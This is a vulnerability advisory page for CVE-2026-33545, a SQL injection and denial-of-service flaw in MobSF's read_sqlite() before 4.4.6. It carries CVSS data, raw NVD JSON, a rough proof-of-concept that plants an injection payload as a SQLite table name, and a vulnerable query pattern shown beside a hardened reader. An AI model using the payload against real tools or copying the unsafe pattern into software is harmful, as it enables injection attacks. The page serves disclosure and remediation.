Security Vulnerability Report
CVE-2026-33545 CVSS 5.3 MEDIUM

CVE-2026-33545

Published: 2026-03-26 21:17:06
Last Modified: 2026-04-03 20:28:06

Description

MobSF is a mobile application security testing tool. Prior to version 4.4.6, MobSF's `read_sqlite()` function in `mobsf/MobSF/utils.py` (lines 542-566) uses Python string formatting (`%`) to construct SQL queries with table names read from a SQLite database's `sqlite_master` table. When a security analyst uses MobSF to analyze a malicious mobile application containing a crafted SQLite database, attacker-controlled table names are interpolated directly into SQL queries without parameterization or escaping. This allows an attacker to cause denial of service and achieve SQL injection. Version 4.4.6 patches the issue.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:opensecurity:mobile_security_framework:*:*:*:*:*:*:*:* - VULNERABLE
MobSF < 4.4.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sqlite3

# PoC: Create a malicious SQLite database to trigger SQL Injection in MobSF < 4.4.6
# The vulnerability exists in read_sqlite() where table names from sqlite_master
# are interpolated into a SQL query using string formatting (%s).

def create_malicious_db():
    conn = sqlite3.connect('malicious_mobsf.db')
    cursor = conn.cursor()
    # Attacker attempts to create a table with a payload as the name.
    # Note: SQLite imposes strict limits on table names, but an attacker
    # might manipulate the DB file binary or use specific techniques to
    # achieve a name that breaks out of the query context in MobSF.
    # Example payload intended for the query: SELECT * FROM %s
    # Payload: 'non_existent_table; DROP TABLE test--'
    malicious_payload = "test) UNION SELECT 1,2,3--"
    try:
        # Standard creation might fail due to syntax, but the concept is injecting
        # this string into the query context.
        # In a real exploit, the attacker crafts the sqlite_master entry.
        query = f"CREATE TABLE '{malicious_payload}' (data TEXT)"
        cursor.execute(query)
        conn.commit()
        print("[+] Created database with potentially malicious table name structure.")
    except Exception as e:
        print(f"[-] Standard creation blocked by SQLite: {e}")
        print("[!] Exploit requires crafting the DB binary or specific manipulation.")
    conn.close()

if __name__ == "__main__":
    create_malicious_db()
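The query pattern the description names, with a hardened reader beside it, as an added example that is not MobSF's own code: `read_sqlite_naive()` mirrors the pre-4.4.6 habit of pasting a `sqlite_master` table name into the query text with `%`, while `read_sqlite_safe()` quotes each name as a SQLite identifier (double quotes, with embedded quotes doubled, since identifiers cannot be bound as parameters) and caps the rows it pulls. The function names, the row cap and the oddly named table are assumptions; the database is constructed in memory.

```python
import sqlite3

# Constructed sample: a table name that would break an unquoted query text.
ODD_TABLE_NAME = 'odd "name"; --'
ROW_CAP = 1000  # assumed cap so a huge table in an analyzed app cannot stall the reader


def quote_identifier(name: str) -> str:
    """Quote a SQLite identifier: wrap in double quotes, double any embedded quote."""
    return '"' + name.replace('"', '""') + '"'


def build_sample_db() -> sqlite3.Connection:
    """In-memory database with one oddly named table (constructed input)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {quote_identifier(ODD_TABLE_NAME)} (id INTEGER, body TEXT)")
    conn.execute(f"INSERT INTO {quote_identifier(ODD_TABLE_NAME)} VALUES (?, ?)", (1, "hello"))
    conn.commit()
    return conn


def list_tables(conn: sqlite3.Connection) -> list:
    """Table names as stored in sqlite_master; the author of the file controls these."""
    rows = conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'").fetchall()
    return [r[0] for r in rows]


def read_sqlite_naive(conn: sqlite3.Connection) -> dict:
    """The pre-4.4.6 pattern: the table name becomes part of the query text unchanged."""
    result = {}
    for name in list_tables(conn):
        cur = conn.execute("SELECT * FROM %s" % name)
        result[name] = cur.fetchall()
    return result


def read_sqlite_safe(conn: sqlite3.Connection) -> dict:
    """Hardened reader: the identifier is quoted, and the only bound value is the row cap."""
    result = {}
    for name in list_tables(conn):
        cur = conn.execute("SELECT * FROM %s LIMIT ?" % quote_identifier(name), (ROW_CAP,))
        columns = [d[0] for d in cur.description]
        result[name] = {"columns": columns, "rows": cur.fetchall()}
    return result


def naive_read_ok(conn: sqlite3.Connection) -> bool:
    """True if the naive reader survives every table in the file; False when a name
    makes the query fail, which is the denial-of-service case the advisory describes."""
    try:
        read_sqlite_naive(conn)
        return True
    except sqlite3.Error:
        return False


if __name__ == "__main__":
    db = build_sample_db()
    print("naive reader survives:", naive_read_ok(db))
    print("hardened reader:", read_sqlite_safe(db))
```

Quoting is the right tool here because SQLite binds parameters only in value positions; an identifier has to be made safe by escaping. The LIMIT is a separate, defensive choice for an analyzer that opens databases it did not create.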

References

https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/6f8a43c1b78d21cfbd7186aaafa7f622d990e0f1 (Patch)
https://github.com/MobSF/Mobile-Security-Framework-MobSF/releases/tag/v4.4.6 (Release Notes)
https://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-hqjr-43r5-9q58 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33545", "sourceIdentifier": "[email protected]", "published": "2026-03-26T21:17:06.047", "lastModified": "2026-04-03T20:28:05.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MobSF is a mobile application security testing tool used. Prior to version 4.4.6, MobSF's `read_sqlite()` function in `mobsf/MobSF/utils.py` (lines 542-566) uses Python string formatting (`%`) to construct SQL queries with table names read from a SQLite database's `sqlite_master` table. When a security analyst uses MobSF to analyze a malicious mobile application containing a crafted SQLite database, attacker-controlled table names are interpolated directly into SQL queries without parameterization or escaping. This allows an attacker to cause denial of service and achieve SQL injection. Version 4.4.6 patches the issue."}, {"lang": "es", "value": "MobSF es una herramienta utilizada para pruebas de seguridad de aplicaciones móviles. Antes de la versión 4.4.6, la función `read_sqlite()` de MobSF en `mobsf/MobSF/utils.py` (líneas 542-566) utiliza el formato de cadena de Python ('%') para construir consultas SQL con nombres de tabla leídos de la tabla `sqlite_master` de una base de datos SQLite. Cuando un analista de seguridad utiliza MobSF para analizar una aplicación móvil maliciosa que contiene una base de datos SQLite manipulada, los nombres de tabla controlados por el atacante se interpolan directamente en las consultas SQL sin parametrización ni escape. Esto permite a un atacante causar denegación de servicio y lograr inyección SQL. La versión 4.4.6 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensecurity:mobile_security_framework:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.4.6", "matchCriteriaId": "5848A16B-0512-4FBE-8D64-7D14DDCA8625"}]}]}], "references": [{"url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/6f8a43c1b78d21cfbd7186aaafa7f622d990e0f1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/releases/tag/v4.4.6", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-hqjr-43r5-9q58", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}